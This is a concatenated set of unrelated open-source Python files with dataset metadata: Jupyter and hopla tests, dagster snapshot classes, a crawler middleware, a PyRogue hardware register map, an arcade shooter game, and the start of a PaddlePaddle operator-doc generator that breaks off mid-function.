assert updated == target
@mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)
def test_run_code():
"""Test that Python code runs inside a jupyter kernel successfully."""
# test standard code
code = ("a = 3\nprint(a)", )
ju.run_code(code)
# test magic command
code = ("%%time\nprint('Some dull code')", )
ju.run_code(code)
| 1.78125 | 2 |
python_modules/dagster/dagster/core/snap/repository_snapshot.py | flowersw/dagster | 3 | 12796630 | <filename>python_modules/dagster/dagster/core/snap/repository_snapshot.py
from collections import OrderedDict, namedtuple
from dagster import RepositoryDefinition, check
from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot
from dagster.serdes import whitelist_for_serdes
class RepositoryIndex:
def __init__(self, repository_snapshot):
self.repository_snapshot = check.inst_param(
repository_snapshot, 'repository_snapshot', RepositorySnapshot
)
self._pipeline_index_map = OrderedDict(
(pipeline_snapshot.name, PipelineIndex(pipeline_snapshot))
for pipeline_snapshot in repository_snapshot.pipeline_snapshots
)
def get_pipeline_index(self, pipeline_name):
return self._pipeline_index_map[pipeline_name]
def has_pipeline_index(self, pipeline_name):
return pipeline_name in self._pipeline_index_map
def get_pipeline_indices(self):
return self._pipeline_index_map.values()
@staticmethod
def from_repository_def(repository_definition):
return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition))
@whitelist_for_serdes
class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')):
def __new__(cls, name, pipeline_snapshots):
return super(RepositorySnapshot, cls).__new__(
cls,
name=check.str_param(name, 'name'),
pipeline_snapshots=check.list_param(
pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot
),
)
def has_pipeline_snapshot(self, pipeline_name):
check.str_param(pipeline_name, 'pipeline_name')
for pipeline in self.pipeline_snapshots:
if pipeline.name == pipeline_name:
return True
return False
def get_pipeline_snapshot(self, pipeline_name):
check.str_param(pipeline_name, 'pipeline_name')
for pipeline in self.pipeline_snapshots:
if pipeline.name == pipeline_name:
return pipeline
check.failed('pipeline not found')
def get_all_pipeline_snapshots(self):
return self.pipeline_snapshots
@staticmethod
def from_repository_definition(repository_definition):
check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition)
return RepositorySnapshot(
name=repository_definition.name,
pipeline_snapshots=[
PipelineSnapshot.from_pipeline_def(pipeline_definition)
for pipeline_definition in repository_definition.get_all_pipelines()
],
)
| 2.234375 | 2 |
spider_frame/framework/build/lib/scrapy_plus/middlwares/spider_middlewares.py | originx-23/spider_frame | 1 | 12796631 | # 下载器中间件模块: 用于对请求和响应数据进行预处理
class SpiderMiddleware(object):
def process_request(self, request):
# 用于处理请求的: 在请求对象交给引擎之前调用
print("SpiderMiddleware-process_request-{}".format(request.url))
return request
def process_response(self, response):
# 用于处理响应数据: 在响应对象交给爬虫之前调用
print("SpiderMiddleware-process_response-{}".format(response.url))
return response
| 3.15625 | 3 |
src/tests/hoplalib/hatchery/test_hatchpotionmodels.py | rickie/hopla | 0 | 12796632 | <reponame>rickie/hopla<filename>src/tests/hoplalib/hatchery/test_hatchpotionmodels.py<gh_stars>0
#!/usr/bin/env python3
import random
from typing import List
import click
import pytest
from hopla.hoplalib.errors import YouFoundABugRewardError
from hopla.hoplalib.hatchery.hatchdata import HatchPotionData
from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \
HatchPotionException
_SAMPLE_SIZE = 10
class TestHatchPotion:
def test__init__invalid_name_fail(self):
name = "InvalidName"
with pytest.raises(HatchPotionException) as exec_info:
HatchPotion(name, quantity=1)
assert str(exec_info.value).startswith(f"{name} is not a valid hatching potion name.")
assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))
@pytest.mark.parametrize(
"potion_name,quantity",
list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),
range(-_SAMPLE_SIZE, 0)))
)
def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int):
with pytest.raises(HatchPotionException) as exec_info:
HatchPotion(potion_name, quantity=quantity)
assert str(exec_info.value).startswith(f"{quantity} is below 0.")
assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))
@pytest.mark.parametrize(
"potion_name,quantity",
list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),
range(0, _SAMPLE_SIZE)))
)
def test__repr__ok(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
result: str = repr(potion)
assert result == f"HatchPotion({potion_name}: {quantity})"
def test__eq__(self):
assert HatchPotion("Red") == HatchPotion("Red")
assert HatchPotion("Shimmer", quantity=1) == HatchPotion("Shimmer")
assert HatchPotion("Silver") != HatchPotion("Silver", quantity=2)
assert HatchPotion("Watery") != HatchPotion("Glow")
@pytest.mark.parametrize("potion_name,quantity", [
("Base", 10),
("CottonCandyBlue", 1),
("Golden", 0),
])
def test_is_standard_potion(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
assert potion.is_standard_hatch_potion() is True
assert potion.is_magic_hatch_potion() is False
assert potion.is_wacky_hatch_potion() is False
@pytest.mark.parametrize("potion_name,quantity", [
("BirchBark", 10),
("Windup", 1),
("Vampire", 0),
("Ruby", 9),
("Amber", 69),
("MossyStone", 42),
("SolarSystem", 9001),
])
def test_is_magic_potion(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
assert potion.is_standard_hatch_potion() is False
assert potion.is_magic_hatch_potion() is True
assert potion.is_wacky_hatch_potion() is False
@pytest.mark.parametrize("potion_name,quantity", [
("Veggie", 10),
("Dessert", 0),
])
def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
assert potion.is_standard_hatch_potion() is False
assert potion.is_magic_hatch_potion() is False
assert potion.is_wacky_hatch_potion() is True
class TestHatchPotionCollection:
def test__init__empty_ok(self):
collection = HatchPotionCollection()
assert collection == HatchPotionCollection({})
assert len(collection) == 0
def test__init__ok(self):
potion_dict = {"Base": 0, "Moonglow": 42, "Sunset": 2}
collection = HatchPotionCollection(potion_dict)
assert collection["Base"] == HatchPotion("Base", quantity=0)
assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42)
assert collection["Sunset"] == HatchPotion("Sunset", quantity=2)
def test__eq__ok(self):
left = HatchPotionCollection({"Frost": 1, "Glow": 1})
right = HatchPotionCollection({"Glow": 1, "Frost": 2})
assert left != right
assert HatchPotionCollection() == HatchPotionCollection()
assert HatchPotionCollection({"StarryNight": 1}) != HatchPotionCollection()
assert HatchPotionCollection({"Windup": 2}) == HatchPotionCollection({"Windup": 2})
assert HatchPotionCollection({"Frost": 1}) != HatchPotionCollection({"Frost": 2})
def test__iter__ok(self):
collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 2})
iterator = iter(collection)
assert next(iterator) == "Base"
assert next(iterator) == "Moonglow"
assert next(iterator) == "Sunset"
with pytest.raises(StopIteration):
next(iterator)
def test__getitem__ok(self):
collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 0})
assert collection["Base"] == HatchPotion("Base", quantity=1)
assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42)
assert collection["Sunset"] == HatchPotion("Sunset", quantity=0)
def test_values_ok(self):
potion1, quantity1 = "Dessert", 10
potion2, quantity2 = "MossyStone", 1
potion3, quantity3 = "StainedGlass", 2
collection = HatchPotionCollection({
potion1: quantity1, potion2: quantity2, potion3: quantity3
})
generator = collection.values()
assert next(generator) == HatchPotion(potion1, quantity=quantity1)
assert next(generator) == HatchPotion(potion2, quantity=quantity2)
assert next(generator) == HatchPotion(potion3, quantity=quantity3)
with pytest.raises(StopIteration):
_ = next(generator)
def test_values_as_list_ok(self):
potion1, quantity1 = "Golden", 1
potion2, quantity2 = "Sunshine", 41
potion3, quantity3 = "Vampire", 3
collection = HatchPotionCollection({
potion1: quantity1, potion2: quantity2, potion3: quantity3
})
result: List[HatchPotion] = list(collection.values())
expected: List[HatchPotion] = [
HatchPotion(potion1, quantity=quantity1),
HatchPotion(potion2, quantity=quantity2),
HatchPotion(potion3, quantity=quantity3)
]
assert result == expected
def test_remove_hatch_potion_ok(self):
potion1_quantity = 3
potion2_quantity = 42
potion3_name, potion3_quantity = "Sunset", 1
collection = HatchPotionCollection({
"Base": potion1_quantity,
"Moonglow": potion2_quantity,
potion3_name: potion3_quantity
})
collection.remove_hatch_potion(HatchPotion("Base"))
collection.remove_hatch_potion(HatchPotion("Moonglow"))
collection.remove_hatch_potion(HatchPotion(potion3_name))
assert collection["Base"] == HatchPotion("Base",
quantity=potion1_quantity - 1)
assert collection["Moonglow"] == HatchPotion("Moonglow",
quantity=potion2_quantity - 1)
assert collection[potion3_name] == HatchPotion(potion3_name,
quantity=potion3_quantity - 1)
def test_remove_hatch_potion_not_available_faile(self):
collection = HatchPotionCollection({"Base": 1})
not_found_potion_name = "Moonglow"
with pytest.raises(HatchPotionException) as exec_info:
collection.remove_hatch_potion(HatchPotion(not_found_potion_name))
expected_msg = f"{not_found_potion_name} was not in the collection "
assert str(exec_info.value).startswith(expected_msg)
| 2.59375 | 3 |
firmware/common/pyrogue/common/AppCore.py | ruck314/dev-board-cryo | 1 | 12796633 | <filename>firmware/common/pyrogue/common/AppCore.py
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : PyRogue AMC Carrier Cryo Demo Board Application
#-----------------------------------------------------------------------------
# File : AppCore.py
# Created : 2017-04-03
#-----------------------------------------------------------------------------
# Description:
# PyRogue AMC Carrier Cryo Demo Board Application
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
from common.SimRtmCryoDet import *
class StreamData(pr.Device):
def __init__( self,
name = "StreamReg",
description = "Stream control",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#########
# Devices
for i in range(4096):
self.add(pr.RemoteVariable(
name = f'StreamData[{i}]',
description = "Dummy stream data",
offset = 0x000000 + i*0x2,
bitSize = 16,
bitOffset = 0,
base = pr.Int,
mode = "RW",
))
class StreamControl(pr.Device):
def __init__( self,
name = "StreamControl",
description = "Stream control",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#########
# Devices
self.add(pr.RemoteVariable(
name = "EnableStreams",
description = "EnableStream",
offset = 0x00000008,
bitSize = 1,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "StreamCounterRst",
description = "Reset stream counters",
offset = 0x00000008,
bitSize = 1,
bitOffset = 8,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "EofeCounterRst",
description = "Reset stream EOFE",
offset = 0x00000008,
bitSize = 1,
bitOffset = 9,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "StreamCounter",
description = "Count number of stream triggers",
offset = 0x0000000C,
bitSize = 32,
bitOffset = 0,
base = pr.UInt,
mode = "RO",
pollInterval = 1,
))
self.add(pr.RemoteVariable(
name = "EofeCounter",
description = "Stream EOFE counter",
offset = 0x00000010,
bitSize = 32,
bitOffset = 0,
base = pr.UInt,
mode = "RO",
pollInterval = 1,
))
class AppCore(pr.Device):
def __init__( self,
name = "AppCore",
description = "MicrowaveMux Application",
numRxLanes = [0,0],
numTxLanes = [0,0],
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#########
# Devices
#########
# for i in range(2):
# if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)):
# self.add(AmcMicrowaveMuxCore(
# name = "MicrowaveMuxCore[%i]" % (i),
# offset = (i*0x00100000),
# expand = True,
# ))
#
# self.add(SysgenCryo(offset=0x01000000, expand=True))
self.add(SimRtmCryoDet( offset=0x02000000, expand=False))
###########
# Registers
###########
self.add(pr.RemoteVariable(
name = "DacSigTrigDelay",
description = "DacSig TrigDelay",
offset = 0x03000000,
bitSize = 24,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
units = "1/(307MHz)",
))
self.add(pr.RemoteVariable(
name = "DacSigTrigArm",
description = "DacSig TrigArm",
offset = 0x03000004,
bitSize = 1,
bitOffset = 0,
base = pr.UInt,
mode = "WO",
hidden = True,
))
self.add(StreamControl(
offset=0x03000000,
))
self.add(StreamData(
offset=0x04000000,
expand=False,
))
##############################
# Commands
##############################
@self.command(description="Arms for a DAC SIG Trigger to the DAQ MUX",)
def CmdDacSigTrigArm():
self.DacSigTrigArm.set(1)
| 1.460938 | 1 |
shooting_game/assets/Shooter-Game.py | rodsam9/cse210-project | 0 | 12796634 | <filename>shooting_game/assets/Shooter-Game.py<gh_stars>0
import random
import arcade
import math
import os
from arcade.color import BLACK, WHITE
SPRITE_SCALING_PLAYER = .60
SPRITE_SCALING_ENEMY = 0.5
SPRITE_SCALING_ENEMY_2 = 0.15
SPRITE_SCALING_ENEMY_3 = 0.3
SPRITE_SCALING_BULLET = 0.7
ENEMY_COUNT = 15
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Shooter Game"
SPRITE_SPEED = 0.20
BULLET_SPEED = 5
HEALTHBAR_WIDTH = 25
HEALTHBAR_HEIGHT = 5
HEALTHBAR_OFFSET_Y = -10
HEALTH_NUMBER_OFFSET_X = -10
HEALTH_NUMBER_OFFSET_Y = -25
MOVEMENT_SPEED = 5
class PLAYER(arcade.Sprite):
def __init__(self, image, scale, player_max_health):
super().__init__(image, scale)
# Add extra attributes for health
self.player_max_health = player_max_health
self.player_cur_health = player_max_health
def player_draw_health_number(self):
# Draw how many health the enemies have
health_string = f"{self.player_cur_health}/{self.player_max_health}"
start_x = 25
start_y = 40
arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12)
# arcade.draw_text(health_string,
# start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,
# start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,
# font_size=12,
# color=arcade.color.WHITE)
def player_draw_health_bar(self):
# Draw the health bar
# Draw the red background
start_x = 120
start_y = 35
if self.player_cur_health < self.player_max_health:
arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X,
start_y + HEALTHBAR_OFFSET_Y,
width=HEALTHBAR_WIDTH + 60,
height=HEALTHBAR_HEIGHT + 10,
color=arcade.color.RED)
# Calculate width based on health
start_x = 85
start_y = 25
health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health)
arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
start_y ,
width=health_width + 10,
height=HEALTHBAR_HEIGHT + 10,
color=arcade.color.GREEN)
def update(self):
""" Move the player """
# Move player around the screen
self.center_x += self.change_x
self.center_y += self.change_y
# Check for out-of-bounds
if self.left < 0:
self.left = 0
elif self.right > SCREEN_WIDTH - 1:
self.right = SCREEN_WIDTH - 1
# Make sure he cant go off the screen
if self.bottom < 0:
self.bottom = 0
elif self.top > SCREEN_HEIGHT - 1:
self.top = SCREEN_HEIGHT - 1
class ENEMY(arcade.Sprite):
def update(self):
# Rotate the coin.
# The arcade.Sprite class has an "angle" attribute that controls
# the sprite rotation. Change this, and the sprite rotates.
self.angle += self.change_angle
def follow_sprite(self, player_sprite):
# This tells the enemies to go to the main guy
if self.center_y < player_sprite.center_y:
self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y)
elif self.center_y > player_sprite.center_y:
self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y)
if self.center_x < player_sprite.center_x:
self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x)
elif self.center_x > player_sprite.center_x:
self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x)
def __init__(self, image, scale, enemy_max_health):
super().__init__(image, scale)
# Add extra attributes for health
self.enemy_max_health = enemy_max_health
self.enemy_cur_health = enemy_max_health
def enemy_draw_health_number(self):
# Draw how many health the enemies have
health_string = f"{self.enemy_cur_health}/{self.enemy_max_health}"
arcade.draw_text(health_string,
start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,
start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,
font_size=12,
color=arcade.color.WHITE)
def enemy_draw_health_bar(self):
# Draw the health bar
# Draw the red background
if self.enemy_cur_health < self.enemy_max_health:
arcade.draw_rectangle_filled(center_x=self.center_x,
center_y=self.center_y + HEALTHBAR_OFFSET_Y,
width=HEALTHBAR_WIDTH,
height=3,
color=arcade.color.RED)
# Calculate width based on health
health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health)
arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
center_y=self.center_y - 10,
width=health_width,
height=HEALTHBAR_HEIGHT,
color=arcade.color.GREEN)
class MenuView(arcade.View):
""" Class that manages the 'menu' view. """
def on_show(self):
""" Called when switching to this view"""
arcade.set_background_color(arcade.color.BLACK)
def on_draw(self):
""" Draw the menu """
arcade.start_render()
start_x = 220
start_y = 370
arcade.draw_text("Shooter Game", start_x, start_y, arcade.color.WHITE, 50)
self.player_sprite = PLAYER(":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png", SPRITE_SCALING_PLAYER, player_max_health=10)
start_x = 208
start_y = 270
arcade.draw_text("Use the arrow keys on your keyboard to move around", start_x, start_y, arcade.color.RED, 15)
start_x = 310
start_y = 240
arcade.draw_text("Use your mouse to aim", start_x, start_y, arcade.color.RED, 15)
start_x = 360
start_y = 210
arcade.draw_text("Click to Shoot", start_x, start_y, arcade.color.RED, 15)
start_x = 330
start_y = 110
arcade.draw_text("Click to start", start_x, start_y, arcade.color.WHITE, 20)
arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE)
def on_mouse_press(self, _x, _y, _button, _modifiers):
""" Use a mouse press to advance to the 'game' view. """
game_view = MyGame()
game_view.setup()
self.window.show_view(game_view)
arcade.run()
class GameOverView(arcade.View):
""" Class to manage the game over view """
def on_show(self):
""" Called when switching to this view"""
arcade.set_background_color(arcade.color.BLACK)
def on_draw(self):
""" Draw the game over view """
arcade.start_render()
arcade.draw_text("Game Over!\n", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5,
arcade.color.RED, 100, anchor_x="center")
start_x = 290
start_y = 270
arcade.draw_text(f"You died in level: {self.window.level}", start_x, start_y, arcade.color.RED, 20)
arcade.draw_text("Click ESCAPE to return to Main Menu.\n", SCREEN_WIDTH/2, SCREEN_HEIGHT/4,
arcade.color.WHITE, 25, anchor_x="center")
def on_key_press(self, key, _modifiers):
""" If user hits escape, go back to the main menu view """
if key == arcade.key.ESCAPE:
menu_view = MenuView()
self.window.show_view(menu_view)
class MyGame(arcade.View):
""" Main application class. """
def __init__(self):
""" Initializer """
# Call the parent class initializer
#super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
super().__init__()
# Variables that will hold sprite lists
self.player_list = None
self.enemy_list = None
self.bullet_list = None
# Set up the player
self.player_sprite = None
self.enemy_health = 2
self.enemy_health2 = 5
self.enemy_health3 = 10
self.good = True
self.window.level = 1
self.updated_level = -1
self.amount_of_enemies = 5
self.speed = SPRITE_SPEED
# Game Sounds
self.newLevel_sound = arcade.load_sound("shooting_game/assets/sounds/newLevel.wav")
self.gun_sound = arcade.load_sound("shooting_game/assets/sounds/shoot.wav")
self.hit_sound = arcade.load_sound("shooting_game/assets/sounds/shoot.wav")
self.death_sound = arcade.load_sound("shooting_game/assets/sounds/deathenemy.wav")
self.playerDeath_sound = arcade.load_sound("shooting_game/assets/sounds/death.wav")
self.gameOver_sound = arcade.load_sound("shooting_game/assets/sounds/gameOver.wav")
self.left_pressed = False
self.right_pressed = False
self.up_pressed = False
self.down_pressed = False
self.width = SCREEN_WIDTH
# Background image will be stored in this variable
self.background = None
def levels(self):
while self.good:
if self.window.level >= 0 and self.window.level <= 3:
for i in range(self.amount_of_enemies):
# Create the enemy image
enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health)
# Position the enemy
enemy.center_x = random.randrange(SCREEN_WIDTH)
enemy.center_y = random.randrange(120, SCREEN_HEIGHT)
# Add the enemy to the lists
self.enemy_list.append(enemy)
if self.enemy_list == 0:
self.window.level = self.updated_level + 1
arcade.play_sound(self.newLevel_sound)
else:
self.good = False
elif self.window.level > 3 and self.window.level < 6:
for i in range(self.amount_of_enemies):
# Create the enemy image
enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health)
enemy2 = ENEMY(":resources:images/animated_characters/robot/robot_fall.png", SPRITE_SCALING_ENEMY_2, self.enemy_health2)
# Position the enemy
enemy.center_x = random.randrange(SCREEN_WIDTH)
enemy.center_y = random.randrange(120, SCREEN_HEIGHT)
enemy2.center_x = random.randrange(SCREEN_WIDTH)
enemy2.center_y = random.randrange(120, SCREEN_HEIGHT)
# Add the enemy to the lists
self.enemy_list.append(enemy)
self.enemy_list.append(enemy2)
if self.enemy_list == 0:
self.level = self.updated_level + 1
else:
self.good = False
else:
for i in range(self.amount_of_enemies):
# Create the enemy image
enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health)
enemy2 = ENEMY(":resources:images/animated_characters/robot/robot_fall.png", SPRITE_SCALING_ENEMY_2, self.enemy_health2)
enemy3 = ENEMY(":resources:images/enemies/saw.png", SPRITE_SCALING_ENEMY_3, self.enemy_health3)
# Position the enemy
enemy.center_x = random.randrange(SCREEN_WIDTH)
enemy.center_y = random.randrange(120, SCREEN_HEIGHT)
enemy2.center_x = random.randrange(SCREEN_WIDTH)
enemy2.center_y = random.randrange(120, SCREEN_HEIGHT)
enemy3.center_x = random.randrange(SCREEN_WIDTH)
enemy3.center_y = random.randrange(120, SCREEN_HEIGHT)
# Add the enemy to the lists
self.enemy_list.append(enemy)
self.enemy_list.append(enemy2)
self.enemy_list.append(enemy3)
if self.enemy_list == 0:
self.window.level = self.updated_level + 1
else:
self.good = False
def setup(self):
# Set up the game
# Sprite lists
self.window.level = 1
self.player_list = arcade.SpriteList()
self.enemy_list = arcade.SpriteList()
self.bullet_list = arcade.SpriteList()
self.player_sprite = PLAYER(":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png", SPRITE_SCALING_PLAYER, player_max_health=10)
self.player_sprite.center_x = 400
self.player_sprite.center_y = 300
self.player_list.append(self.player_sprite)
self.levels()
# Set the background color
self.background = arcade.load_texture(":resources:images/backgrounds/abstract_1.jpg")
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.UP:
self.up_pressed = True
elif key == arcade.key.DOWN:
self.down_pressed = True
elif key == arcade.key.LEFT:
self.left_pressed = True
elif key == arcade.key.RIGHT:
self.right_pressed = True
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.UP:
self.up_pressed = False
elif key == arcade.key.DOWN:
self.down_pressed = False
elif key == arcade.key.LEFT:
self.left_pressed = False
elif key == arcade.key.RIGHT:
self.right_pressed = False
def on_draw(self):
# render the screen befroe start drawing
arcade.start_render()
arcade.draw_lrwh_rectangle_textured(0, 0,
SCREEN_WIDTH, SCREEN_HEIGHT,
self.background)
# Draw all the sprites
self.enemy_list.draw()
self.bullet_list.draw()
self.player_list.draw()
output = f"Level: {self.window.level}"
arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15)
for player in self.player_list:
player.player_draw_health_number()
player.player_draw_health_bar()
for enemy in self.enemy_list:
enemy.enemy_draw_health_number()
enemy.enemy_draw_health_bar()
def on_mouse_press(self, x, y, button, modifiers):
# Called whenever the mouse button is clicked
arcade.play_sound(self.gun_sound)
# Create a bullet
bullet = arcade.Sprite(":resources:images/space_shooter/meteorGrey_small1.png", SPRITE_SCALING_BULLET)
# Position the bullet at the player's current location
start_x = self.player_sprite.center_x
start_y = self.player_sprite.center_y
bullet.center_x = start_x
bullet.center_y = start_y
# Get from the mouse the destination location for the bullet
dest_x = x
dest_y = y
# Do math to calculate how to get the bullet to the destination.
x_diff = dest_x - start_x
y_diff = dest_y - start_y
angle = math.atan2(y_diff, x_diff)
# Taking into account the angle, calculate our change_x
# and change_y. Velocity is how fast the bullet travels.
bullet.change_x = math.cos(angle) * BULLET_SPEED
bullet.change_y = math.sin(angle) * BULLET_SPEED
# Add the bullet to the lists
self.bullet_list.append(bullet)
def on_update(self, delta_time):
""" Movement and game logic """
self.player_sprite.change_x = 0
self.player_sprite.change_y = 0
if self.up_pressed and not self.down_pressed:
self.player_sprite.change_y = MOVEMENT_SPEED
elif self.down_pressed and not self.up_pressed:
self.player_sprite.change_y = -MOVEMENT_SPEED
if self.left_pressed and not self.right_pressed:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif self.right_pressed and not self.left_pressed:
self.player_sprite.change_x = MOVEMENT_SPEED
self.player_list.update()
for enemy in self.enemy_list:
enemy.follow_sprite(self.player_sprite)
for enemy2 in self.enemy_list:
enemy2.follow_sprite(self.player_sprite)
for enemy3 in self.enemy_list:
enemy3.follow_sprite(self.player_sprite)
# update all sprites
self.bullet_list.update()
if len(self.enemy_list) == 0 and self.window.level > self.updated_level:
self.window.level += 1
self.good = True
self.levels()
self.amount_of_enemies += 2
#self.enemy_health += 1
self.speed += .20
arcade.play_sound(self.newLevel_sound)
for enemy in self.enemy_list:
player_hit = arcade.check_for_collision_with_list(enemy, self.player_list)
if len(player_hit) > 0:
enemy.remove_from_sprite_lists()
for player in player_hit:
# Make sure this is the right sprite
if not isinstance(player, PLAYER):
raise TypeError("List contents must be all ints")
# Remove one health point
player.player_cur_health -= 1
# Check health
if player.player_cur_health <= 0:
arcade.play_sound(self.gameOver_sound)
game_over = GameOverView()
self.window.show_view(game_over)
arcade.run()
# enemy dead
player.remove_from_sprite_lists()
else:
# Not dead
arcade.play_sound(self.playerDeath_sound)
# Loop through each bullet
for bullet in self.bullet_list:
# Check this bullet to see if it hit a enemy
hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list)
# If it did, get rid of the bullet
if len(hit_list) > 0:
bullet.remove_from_sprite_lists()
# For every enemy we hit, process
for enemy in hit_list:
# Make sure this is the right sprite
if not isinstance(enemy, ENEMY):
raise TypeError("List contents must be all ints")
# Remove one health point
enemy.enemy_cur_health -= 1
# Check health
if enemy.enemy_cur_health <= 0:
# enemy dead
enemy.remove_from_sprite_lists()
arcade.play_sound(self.death_sound)
else:
# Not dead
arcade.play_sound(self.hit_sound)
# If the bullet flies off-screen, remove it.
if bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0 or bullet.left > self.width:
bullet.remove_from_sprite_lists()
def main():
window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, "Shooter Game")
menu_view = MenuView()
window.show_view(menu_view)
arcade.run()
window.level = 0
# game = MyGame()
# game.setup()
# arcade.run()
if __name__ == "__main__":
main() | 3.078125 | 3 |
portal/portal/legacy/operators.py | sneaxiy/PaddlePaddle.org | 47 | 12796635 | <gh_stars>10-100
import json
import os
import re
import codecs
from bs4 import BeautifulSoup
from django.template import Template, Context
import markdown
from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS
OPERATOR_TEMPLATE = '<div class="section" id="{{ type }}">' + (
'<h2>{{ type }}</h2>') + (
'<dl class="function"><dd>{{ comment|safe }}') + (
'<table class="docutils field-list">') + (
'<colgroup><col class="field-name"><col class="field-body"></colgroup>') + (
'<tbody valign="top">') + (
'<tr class="field-odd field">') + (
'<th class="field-name">Inputs:</th>') + (
'<td class="field-body"><ul class="first simple">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + (
'</tr>') + (
'<tr class="field-even field"><th class="field-name">Outputs:</th>') + (
'<td class="field-body"><ul class="first simple">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + (
'</tr>') + (
'{% if attrs|length_is:"0" %}{% else %}<tr class="field-odd field"><th class="field-name">Attributes:</th>') + (
'<td class="field-body"><ul class="first simple">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + (
'</tr>{% endif %}') + (
'</tbody>') + (
'</table></dd>') + (
'</dl>') + (
'</div>')
OPERATORS_WRAPPER = (
'<div class="document">{% verbatim %}<h1>Operators</h1><div class="section" id="operators">',
'</div>{% endverbatim %}</div>'
)
OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json'
def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name):
try:
operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir)
if not os.path.exists(operators_json_path):
raise Exception('operators.json does not exists in %s' % operators_json_path)
generate_operators_page_with_path(operators_json_path, generated_docs_dir)
except Exception, e:
print 'Failed to build operator docs because: ', e
def generate_operators_page_with_path(operators_api_path, destination_dir):
try:
# Open the operators API file.
with open(operators_api_path) as raw_operators_api_file:
raw_operators_api = raw_operators_api_file.read()
